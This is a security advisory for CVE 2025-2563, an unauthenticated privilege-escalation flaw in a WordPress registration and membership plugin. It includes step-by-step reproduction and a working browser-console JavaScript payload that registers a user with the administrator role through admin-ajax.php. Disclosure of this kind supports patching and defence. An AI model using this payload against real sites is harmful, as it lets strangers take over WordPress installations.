User Registration & Membership (Free < 4.1.2, Pro < 5.1.2) – Unauthenticated Privilege Escalation | CVE 2025-2563

Description

The plugins do not prevent users to set their account role when the Membership Addon is enabled, leading to a privilege escalation issue and allowing unauthenticated users to gain admin privileges

Proof of Concept

1. Install the plugin https://wordpress.org/plugins/user-registration/.  
2. Enable the `Membership` addon at `/wp-admin/admin.php?page=user-registration-dashboard#features`.  
3. As unauthenticated, visit `/membership-pricing/` and register a new user.  
4. As unauthenticated again, visit `/membership-pricing/` and execute the JavaScript payload below via the browser console, replacing the `username` value with the previously registered username.  
5. Upon logging into the registered account, notice that you have `administrator` permissions.  

**Payload:**  
```javascript
async function payload(username, role) {

	const membership_id =  document.querySelector("input.ur_membership_input_class.ur_membership_radio_input").value;
	
	const security = ur_membership_frontend_localized_data._nonce;
	
    const formData = new FormData();
    formData.append("action", "user_registration_membership_register_member");
    formData.append("members_data", JSON.stringify({"membership":membership_id,"total":"0","payment_method":"free","start_date":"2025-3-18","username":username,"role":role}));
    formData.append("form_response", JSON.stringify({"username":username,"success_message_positon":"1","form_login_option":"0","redirect_timeout":2000,"registration_type":"membership"}));
    formData.append("_wpnonce", security);

    try {
        const response = await fetch("/wp-admin/admin-ajax.php", {
            method: "POST",
            body: formData
        });

        if (!response.ok) {
            console.error(`Erro na requisição: ${response.status} - ${response.statusText}`);
        } else {
            const result = await response.text();
            console.log("Resposta recebida:", result);
        }
    } catch (error) {
        console.error("Erro ao enviar a requisição:", error);
    }
}

payload("<username-of-created-account>", "administrator")
```